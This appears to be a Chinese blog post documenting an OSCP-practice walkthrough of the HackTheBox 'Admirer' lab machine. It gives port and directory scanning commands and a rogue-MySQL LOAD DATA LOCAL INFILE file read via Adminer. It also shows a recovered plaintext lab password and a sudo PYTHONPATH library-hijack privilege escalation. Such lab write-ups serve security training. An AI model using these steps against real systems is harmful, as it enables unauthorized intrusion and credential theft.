OSCP备考_0x27_HackThBox靶机_Linux_ Admirer

Ethan医生10小时前靶场5

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.128.76 (扫描TCP)

image.png


nmap -sU --top-ports 100 10.129.128.76 (扫描UDP)

image.png


gobuster dir -u http://10.129.128.76/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,txt,html

image.png

http://10.129.128.76//robots.txt


image.png

直接爆破下面路径

gobuster dir -u http://10.129.128.76/admin-dir/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,txt,html -t 50

image.png

gobuster dir -u http://10.129.128.76/admin-dir/ -w /usr/share/wordlists/dirb/big.txt -x php,txt,html -t 50

image.png

http://10.129.128.76/admin-dir//contacts.txt

image.png

http://10.129.128.76/admin-dir/credentials.txt

image.png

连接FTP

image.png

都下载下来开始搜索有啥可用信息

image.png

image.png

gobuster dir -u http://10.129.128.76/utility-scripts/ -w /usr/share/wordlists/dirb/big.txt -x php,txt,html -t 50

image.png

http://10.129.128.76/utility-scripts//adminer.php

image.png

需要获取到数据库上的password,才能的到真实的waldo密码,


image.png

image.png

CREATE DATABASE admirer;

CREATE USER 'demo'@'%' IDENTIFIED BY 'demo_admirer';

GRANT ALL PRIVILEGES ON * . * TO 'demo'@'%';

FLUSH PRIVILEGES;

create table lez(data VARCHAR(255));

然后打开远程访问

vim /etc/mysql/mariadb.conf.d/50-server.cnf

systemctl restart mysql

image.png

改成0.0.0.0,然后在使用远程的机器进行访问

image.png

然就可以查看index.php

load data local infile '../index.php'

    into table admirer.lez

    fields terminated by '/n'

image.png

image.png


waldo, &<h5b~yK3F#{PaPB&dA}{H>

image.png


image.png

image.png

image.png

利用这py挡案

image.png


sudo PYTHONPATH=/tmp /opt/scripts/admin_tasks.sh 6

根据上面显示可以得出是加载模块shutil里面的函数make_archive 那么就可以利用此处新建一个shutil的python脚本文件然后加载函数make_archive再执行命令进行提权

相关python 库劫持可以参考:https://rastating.github.io/privilege-escalation-via-python-library-hijacking/

image.png

image.png



3f851577a28a525b42596474270c7698

标签: OSCP

相关文章

OSCP备考_0x18_HackThBox靶机_Linux_Popcorn

OSCP备考_0x18_HackThBox靶机_Linux_Popcorn

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.70.193 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x10_HackThBox靶机_Linux_Sunday

OSCP备考_0x10_HackThBox靶机_Linux_Sunday

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.252.243 (扫描TCP)nmap -sU --top-ports 100 10.129.25...

OSCP备考_0x13_Vulnhub靶机_Raven: 1

OSCP备考_0x13_Vulnhub靶机_Raven: 1

名称说明靶机下载链接https://www.vulnhub.com/entry/raven-1,256/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192.168....

OSCP备考_0x20_Vulnhub靶机_symfonos: 3

OSCP备考_0x20_Vulnhub靶机_symfonos: 3

名称说明靶机下载链接https://www.vulnhub.com/entry/symfonos-31,332/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192....

OSCP备考_0x23_HackThBox靶机_Linux_mango

OSCP备考_0x23_HackThBox靶机_Linux_mango

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.108.26 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x04_HackThBox靶机_Linux_cronos

OSCP备考_0x04_HackThBox靶机_Linux_cronos

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.184.136 (扫描TCP)nmap -sU --top-ports 100 10.129.184.136...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。